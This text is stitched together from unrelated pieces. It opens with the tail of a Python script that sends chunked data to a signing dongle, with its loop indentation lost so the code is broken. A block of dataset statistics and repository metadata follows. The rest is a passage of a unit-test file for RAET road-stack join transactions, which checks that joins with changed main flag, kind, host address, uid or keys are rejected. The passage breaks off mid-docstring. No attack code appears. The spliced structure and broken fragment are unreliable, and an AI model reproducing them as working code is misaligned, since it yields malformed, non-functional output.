DATA_CONTRACT = DATA_CONTRACT[255*2:]
print ('data len: ', len(DATA))
print ('remaining: ', len(DATA_CONTRACT))
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
while len(DATA_CONTRACT) > 255*2 :
P1 = "02" # sign continue
DATA = DATA_CONTRACT[0:255*2]
DATA_CONTRACT = DATA_CONTRACT[255*2:]
print ('data len: ', len(DATA))
print ('remaining: ', len(DATA_CONTRACT))
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
P1 = "12" # sign continue and authorize
DATA = DATA_CONTRACT
print ('data len: ', len(DATA))
LEN = format(len(DATA)>>1, 'x')
print (LEN)
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
P1 = "03" # sign finish
LEN = "03"
DATA = ACCOUNT + CHANGE + INDEX
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
print("sig ", binascii.hexlify(ret[1:1+64]))
| 76.215686
| 5,214
| 0.867936
| 723
| 11,661
| 13.929461
| 0.175657
| 0.017377
| 0.022639
| 0.043888
| 0.214676
| 0.210803
| 0.208917
| 0.208917
| 0.208917
| 0.208917
| 0
| 0.63501
| 0.067233
| 11,661
| 152
| 5,215
| 76.717105
| 0.290889
| 0.06183
| 0
| 0.685039
| 0
| 0
| 0.672564
| 0.650105
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.031496
| 0
| 0.031496
| 0.244094
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ff3ea5e356dcc4b5f6ac20119827d7e3252ea81a
| 603,116
|
py
|
Python
|
raet/road/test/test_joining.py
|
renich/raet
|
6bd9c268db07d24373db734e63e11b6fff5f3e0e
|
[
"Apache-2.0"
] | null | null | null |
raet/road/test/test_joining.py
|
renich/raet
|
6bd9c268db07d24373db734e63e11b6fff5f3e0e
|
[
"Apache-2.0"
] | null | null | null |
raet/road/test/test_joining.py
|
renich/raet
|
6bd9c268db07d24373db734e63e11b6fff5f3e0e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
Tests for the join transaction
'''
# pylint: skip-file
# pylint: disable=C0103
import sys
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
import os
import sys
import time
import tempfile
import shutil
from collections import deque
from ioflo.aid.odicting import odict
from ioflo.aid.timing import Timer, StoreTimer
from ioflo.aid.aiding import packByte
from ioflo.base.storing import Store
from ioflo.base.consoling import getConsole
console = getConsole()
# Import raet libs
from raet.abiding import * # import globals
from raet import raeting, nacling
from raet.road import estating, keeping, stacking, packeting, transacting
if sys.platform == 'win32':
TEMPDIR = 'c:\\temp'
if not os.path.exists(TEMPDIR):
os.mkdir(TEMPDIR)
else:
TEMPDIR = '/tmp'
def setUpModule():
console.reinit(verbosity=console.Wordage.concise)
def tearDownModule():
pass
class BasicTestCase(unittest.TestCase):
""""""
def setUp(self):
self.store = Store(stamp=0.0)
self.timer = StoreTimer(store=self.store, duration=1.0)
self.base = tempfile.mkdtemp(prefix="raet", suffix="base", dir=TEMPDIR)
def tearDown(self):
if os.path.exists(self.base):
shutil.rmtree(self.base)
def createRoadData(self,
base,
name='',
ha=None,
main=None,
auto=raeting.AutoMode.never.value,
role=None,
sigkey=None,
prikey=None,
kind=None,
mutable=None, ):
'''
Creates odict and populates with data to setup road stack
'''
data = odict()
data['name'] = name
data['ha'] = ha
data['main'] = main
data['auto'] = auto
data['role'] = role if role is not None else name
data['kind'] = kind
data['mutable'] = mutable
data['dirpath'] = os.path.join(base, 'road', 'keep', name)
signer = nacling.Signer(sigkey)
data['sighex'] = signer.keyhex
data['verhex'] = signer.verhex
privateer = nacling.Privateer(prikey)
data['prihex'] = privateer.keyhex
data['pubhex'] = privateer.pubhex
return data
def createRoadStack(self,
data,
uid=None,
ha=None,
main=None,
auto=None,
role=None,
kind=None,
mutable=None, ):
'''
Creates stack and local estate from data with
and overrides with parameters
returns stack
'''
stack = stacking.RoadStack(store=self.store,
name=data['name'],
uid=uid,
ha=ha or data['ha'],
main=main if main is not None else data['main'],
role=role if role is not None else data['role'],
sigkey=data['sighex'],
prikey=data['prihex'],
auto=auto if auto is not None else data['auto'],
kind=kind if kind is not None else data['kind'],
mutable=mutable if mutable is not None else data['mutable'],
dirpath=data['dirpath'],)
return stack
def join(self, initiator, correspondent, deid=None, duration=1.0,
cascade=False, renewal=False):
'''
Utility method to do join. Call from test method.
'''
console.terse("\nJoin Transaction **************\n")
if not initiator.remotes:
remote = initiator.addRemote(estating.RemoteEstate(stack=initiator,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=correspondent.local.ha))
deid = remote.uid
initiator.join(uid=deid, cascade=cascade, renewal=renewal)
self.serviceStacks([correspondent, initiator], duration=duration)
def allow(self, initiator, correspondent, deid=None, duration=1.0,
cascade=False):
'''
Utility method to do allow. Call from test method.
'''
console.terse("\nAllow Transaction **************\n")
initiator.allow(uid=deid, cascade=cascade)
self.serviceStacks([correspondent, initiator], duration=duration)
def alive(self, initiator, correspondent, duid=None, duration=1.0,
cascade=False):
'''
Utility method to do alive. Call from test method.
'''
console.terse("\nAlive Transaction **************\n")
initiator.alive(uid=duid, cascade=cascade)
self.serviceStacks([correspondent, initiator], duration=duration)
def flushReceives(self, stack):
'''
Flush any queued up udp packets in receive buffer
'''
stack.serviceReceives()
stack.rxes.clear()
def dupReceives(self, stack):
'''
Duplicate each queued up udp packet in receive buffer
'''
stack.serviceReceives()
rxes = stack.rxes
stack.rxes = deque()
for rx in rxes:
stack.rxes.append(rx) # one
stack.rxes.append(rx) # and one more
def serviceStacksDropRx(self, stacks, drop=[], duration=1.0):
'''
Utility method to service queues for list of stacks. Call from test method.
'''
self.timer.restart(duration=duration)
while not self.timer.expired:
for stack in stacks:
stack.serviceReceives()
if stack in drop:
stack.rxes.clear()
stack.serviceRxes()
stack.process()
stack.serviceAllTx()
if all([not stack.transactions for stack in stacks]):
break
self.store.advanceStamp(0.05)
time.sleep(0.05)
def serviceStacks(self, stacks, duration=1.0):
'''
Utility method to service queues for list of stacks. Call from test method.
'''
self.timer.restart(duration=duration)
while not self.timer.expired:
for stack in stacks:
stack.serviceAll()
if all([not stack.transactions for stack in stacks]):
break
self.store.advanceStamp(0.05)
time.sleep(0.05)
def bootstrapJoinedRemotes(self, autoMode=raeting.AutoMode.once.value):
alphaData = self.createRoadData(base=self.base,
name='alpha',
ha=("", raeting.RAET_PORT),
main=True,
auto=autoMode)
keeping.clearAllKeep(alphaData['dirpath'])
alpha = self.createRoadStack(data=alphaData)
betaData = self.createRoadData(base=self.base,
name='beta',
ha=("", raeting.RAET_TEST_PORT),
main=None,
auto=autoMode)
keeping.clearAllKeep(betaData['dirpath'])
beta = self.createRoadStack(data=betaData)
console.terse("\nJoin from Beta to Alpha *********\n")
self.assertTrue(alpha.main)
self.assertIs(alpha.keep.auto, autoMode)
self.assertEqual(len(alpha.remotes), 0)
self.assertIs(beta.main, None)
self.assertIs(beta.keep.auto, autoMode)
self.assertEqual(len(beta.remotes), 0)
self.assertIs(beta.mutable, None)
self.assertIs(alpha.mutable, None)
self.join(beta, alpha)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
return alpha, beta
def bootstrapStacks(self, autoMode=raeting.AutoMode.once.value):
alphaData = self.createRoadData(base=self.base,
name='alpha',
ha=("", raeting.RAET_PORT),
main=True,
auto=autoMode)
keeping.clearAllKeep(alphaData['dirpath'])
alpha = self.createRoadStack(data=alphaData)
betaData = self.createRoadData(base=self.base,
name='beta',
ha=("", raeting.RAET_TEST_PORT),
main=None,
auto=autoMode)
keeping.clearAllKeep(betaData['dirpath'])
beta = self.createRoadStack(data=betaData)
self.assertTrue(alpha.main)
self.assertIs(alpha.keep.auto, autoMode)
self.assertEqual(len(alpha.remotes), 0)
self.assertIs(beta.main, None)
self.assertIs(beta.keep.auto, autoMode)
self.assertEqual(len(beta.remotes), 0)
self.assertIs(beta.mutable, None)
self.assertIs(alpha.mutable, None)
return alpha, beta
def bootstrapStack(self,
name='',
ha=None,
main=None,
auto=raeting.AutoMode.never.value,
role=None,
sigkey=None,
prikey=None,
kind=None,
mutable=None, ):
data = self.createRoadData(base=self.base,
name=name,
ha=ha,
main=main,
auto=auto,
role=role,
sigkey=sigkey,
prikey=prikey,
kind=kind,
mutable=mutable)
keeping.clearAllKeep(data['dirpath'])
stack = self.createRoadStack(data=data)
self.assertIs(stack.main, main)
self.assertIs(data['main'], main)
self.assertIs(stack.keep.auto, auto)
self.assertIs(data['auto'], auto)
self.assertIs(stack.kind, kind)
self.assertIs(data['kind'], kind)
self.assertIs(stack.mutable, mutable)
self.assertIs(data['mutable'], mutable)
self.assertEqual(len(stack.remotes), 0)
return (stack, data)
def copyData(self, remote, fuid=None):
keep = {}
keep['role'] = remote.role
keep['verhex'] = str(remote.verfer.keyhex.decode('ISO-8859-1'))
keep['pubhex'] = str(remote.pubber.keyhex.decode('ISO-8859-1'))
keep['name'] = remote.name
keep['ha'] = remote.ha
keep['fuid'] = fuid if fuid is not None else remote.fuid
keep['main'] = remote.main
keep['kind'] = remote.kind
return keep
def sameRoleKeys(self, remote, data):
'''
Returns True if role and keys match, False otherwise
'''
return (remote.role == data['role'] and
remote.verfer.keyhex == ns2b(data['verhex']) and
remote.pubber.keyhex == ns2b(data['pubhex']))
def sameAll(self, remote, data):
return (self.sameRoleKeys(remote, data) and
remote.name == data['name'] and
remote.ha == data['ha'] and
remote.fuid == data['fuid'] and
remote.main == data['main'] and
remote.kind == data['kind'])
def testJoinBasic(self):
'''
Test join
'''
console.terse("{0}\n".format(self.testJoinBasic.__doc__))
alphaData = self.createRoadData(base=self.base,
name='alpha',
ha=("", raeting.RAET_PORT),
main=True,
auto=raeting.AutoMode.once.value)
keeping.clearAllKeep(alphaData['dirpath'])
alpha = self.createRoadStack(data=alphaData)
betaData = self.createRoadData(base=self.base,
name='beta',
ha=("", raeting.RAET_TEST_PORT),
main=None,
auto=raeting.AutoMode.once.value)
keeping.clearAllKeep(betaData['dirpath'])
beta = self.createRoadStack(data=betaData)
console.terse("\nJoin from Beta to Alpha *********\n")
self.assertTrue(alpha.main)
self.assertIs(alpha.keep.auto, raeting.AutoMode.once.value)
self.assertEqual(len(alpha.remotes), 0)
self.assertIs(beta.main, None)
self.assertIs(beta.keep.auto, raeting.AutoMode.once.value)
self.assertEqual(len(beta.remotes), 0)
self.join(beta, alpha)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
console.terse("\nAllow Beta to Alpha *********\n")
self.allow(beta, alpha)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertTrue(remote.allowed)
self.assertIs(remote.alived, True)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinJointVacuuousMain(self):
'''
Test join vacuous,initiated by main both sides
'''
console.terse("{0}\n".format(self.testJoinJointVacuuousMain.__doc__))
alphaData = self.createRoadData(base=self.base,
name='alpha',
ha=("", raeting.RAET_PORT),
main=True,
auto=raeting.AutoMode.once.value)
keeping.clearAllKeep(alphaData['dirpath'])
alpha = self.createRoadStack(data=alphaData)
betaData = self.createRoadData(base=self.base,
name='beta',
ha=("", raeting.RAET_TEST_PORT),
main=True,
auto=raeting.AutoMode.once.value)
keeping.clearAllKeep(betaData['dirpath'])
beta = self.createRoadStack(data=betaData)
console.terse("\nJoin Joint Alpha and Beta *********\n")
self.assertIs(alpha.main, True)
self.assertIs(alpha.keep.auto, raeting.AutoMode.once.value)
self.assertEqual(len(alpha.remotes), 0)
self.assertIs(beta.main, True)
self.assertIs(beta.keep.auto, raeting.AutoMode.once.value)
self.assertEqual(len(beta.remotes), 0)
console.terse("\nJoint Join Transaction **************\n")
remote = alpha.addRemote(estating.RemoteEstate(stack=alpha,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=beta.local.ha))
alpha.join(uid=remote.uid, cascade=False, renewal=False)
remote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
beta.join(uid=remote.uid, cascade=False, renewal=False)
self.serviceStacks([alpha, beta], duration=2.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
console.terse("\nAllow Joint Beta and Alpha *********\n")
self.allow(beta, alpha)
self.allow(alpha, beta)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertTrue(remote.allowed)
self.assertIs(remote.alived, True)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinJointVacuuousMainWithMain(self):
'''
Test join vacuous,initiated by main both sides with main kind set
to True in remotes before join
'''
console.terse("{0}\n".format(self.testJoinJointVacuuousMainWithMain.__doc__))
alphaData = self.createRoadData(base=self.base,
name='alpha',
ha=("", raeting.RAET_PORT),
main=True,
auto=raeting.AutoMode.once.value)
keeping.clearAllKeep(alphaData['dirpath'])
alpha = self.createRoadStack(data=alphaData)
betaData = self.createRoadData(base=self.base,
name='beta',
ha=("", raeting.RAET_TEST_PORT),
main=True,
auto=raeting.AutoMode.once.value)
keeping.clearAllKeep(betaData['dirpath'])
beta = self.createRoadStack(data=betaData)
console.terse("\nJoin Joint Alpha and Beta *********\n")
self.assertIs(alpha.main, True)
self.assertIs(alpha.keep.auto, raeting.AutoMode.once.value)
self.assertEqual(len(alpha.remotes), 0)
self.assertIs(beta.main, True)
self.assertIs(beta.keep.auto, raeting.AutoMode.once.value)
self.assertEqual(len(beta.remotes), 0)
console.terse("\nJoint Join Transaction **************\n")
remote = alpha.addRemote(estating.RemoteEstate(stack=alpha,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=beta.local.ha,
main=True))
alpha.join(uid=remote.uid, cascade=False, renewal=False)
remote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True))
beta.join(uid=remote.uid, cascade=False, renewal=False)
self.serviceStacks([alpha, beta], duration=2.0)
for stack in [beta, alpha]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
console.terse("\nAllow Joint Beta and Alpha *********\n")
self.allow(beta, alpha)
self.allow(alpha, beta)
for stack in [beta, alpha]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertTrue(remote.allowed)
self.assertIs(remote.alived, True)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousImmutableRejectNewMain(self):
'''
Test immutable joinent reject vacuous join with an updated main (A1)
'''
console.terse("{0}\n".format(self.testJoinentVacuousImmutableRejectNewMain.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Mutable: No
self.assertIs(alpha.mutable, None)
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
oldMain = None
newMain = True
# Name: Old
# Main: New
self.assertIs(beta.main, oldMain)
beta.main = newMain
# Kind: Either
# RHA: Either
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Ensure remote status is None
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject, nack
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(alpha.nameRemotes), 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
self.assertEqual(len(beta.remotes), 0)
self.assertEqual(len(beta.nameRemotes), 0)
# Assert alphaRemote isn't modified
self.assertTrue(self.sameAll(alphaRemote, keep))
self.assertIs(alphaRemote.acceptance, None)
self.assertIs(betaRemote.acceptance, None)
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Assert remote and role aren't dumped
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIs(remoteData, None)
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousImmutableRejectNewKind(self):
'''
Test immutable joinent reject vacuous join with an updated kind (A2)
'''
console.terse("{0}\n".format(self.testJoinentVacuousImmutableRejectNewKind.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Mutable: No
self.assertIs(alpha.mutable, None)
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
oldKind = None
newKind = 33
# Name: Old
# Main: Either
# Kind: New
self.assertIs(beta.kind, oldKind)
beta.kind = newKind
# RHA: Either
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Ensure remote status is None
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject, nack
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(alpha.nameRemotes), 1)
self.assertEqual(len(beta.remotes), 0)
self.assertEqual(len(beta.nameRemotes), 0)
# Assert alphaRemote isn't modified
self.assertTrue(self.sameAll(alphaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Assert remote and role aren't dumped
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIs(remoteData, None)
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousImmutableRejectNewRha(self):
'''
Test immutable joinent reject vacuous join with an updated remote host address (A3)
'''
console.terse("{0}\n".format(self.testJoinentVacuousImmutableRejectNewRha.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Mutable: No
self.assertIs(alpha.mutable, None)
# Simulate: alpha already know beta with ha=('127.0.0.1', 7532)
# beta connects with ha=('127.0.0.1', 7531)
oldHa = (beta.local.ha[0], 7532)
newHa = (beta.local.ha[0], beta.local.ha[1])
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=oldHa,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
# Name: Old
# Main: Either
# Appl: Either
# RHA: New: alpha remote ha is set to (127.0.0.1, 7532)
# new ha received from beta is (127.0.0.1, 753
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
self.assertEqual(alphaRemote.ha, oldHa)
self.assertEqual(beta.local.ha, newHa)
keep = self.copyData(alphaRemote)
# Ensure remote status is None
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Test
self.join(beta, alpha, deid=betaRemote.nuid, duration=2.0)
# Action: Reject, nack
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(alpha.nameRemotes), 1)
self.assertEqual(len(beta.remotes), 0)
self.assertEqual(len(beta.nameRemotes), 0)
# Assert alphaRemote isn't modified
self.assertTrue(self.sameAll(alphaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Assert role/keys aren't touched
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIs(remoteData, None)
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousImmutableRejectNewFuid(self):
'''
Test immutable joinent reject vacuous join with an updated fuid (A4)
'''
console.terse("{0}\n".format(self.testJoinentVacuousImmutableRejectNewFuid.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Mutable: No
self.assertIs(alpha.mutable, None)
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Simulate: alpha already know beta with fuid=33
# beta connects with a new fuid=newFuid
oldFuid = 33
newFuid = betaRemote.nuid
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=oldFuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
# Name: Old
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Computed
# Fuid: New: alphaRemote has uid=33 that is 'old', betaRemote has uid=2
# Leid: 0
# Reid: New
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Ensure remote status is None
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject, nack
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(alpha.nameRemotes), 1)
self.assertEqual(len(beta.remotes), 0)
self.assertEqual(len(beta.nameRemotes), 0)
# Assert alphaRemote isn't modified
self.assertTrue(self.sameAll(alphaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Assert role/keys aren't touched
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIs(remoteData, None)
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousImmutableRejectNewKeys(self):
'''
Test immutable joinent reject vacuous join with an updated keys (A5)
'''
console.terse("{0}\n".format(self.testJoinentVacuousImmutableRejectNewKeys.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Mutable: No
self.assertIs(alpha.mutable, None)
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
# Name: Old
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: Old
# Keys: New
beta.local.signer = nacling.Signer()
beta.local.priver = nacling.Privateer()
beta.dumpLocalRole()
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Ensure remote status is None
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(alpha.nameRemotes), 1)
self.assertEqual(len(beta.remotes), 0)
self.assertEqual(len(beta.nameRemotes), 0)
self.assertTrue(self.sameAll(alphaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Assert role/keys aren't touched
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIs(remoteData, None)
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousImmutableRejectNewRole(self):
'''
Test immutable joinent reject vacuous join with an updated role (A6)
'''
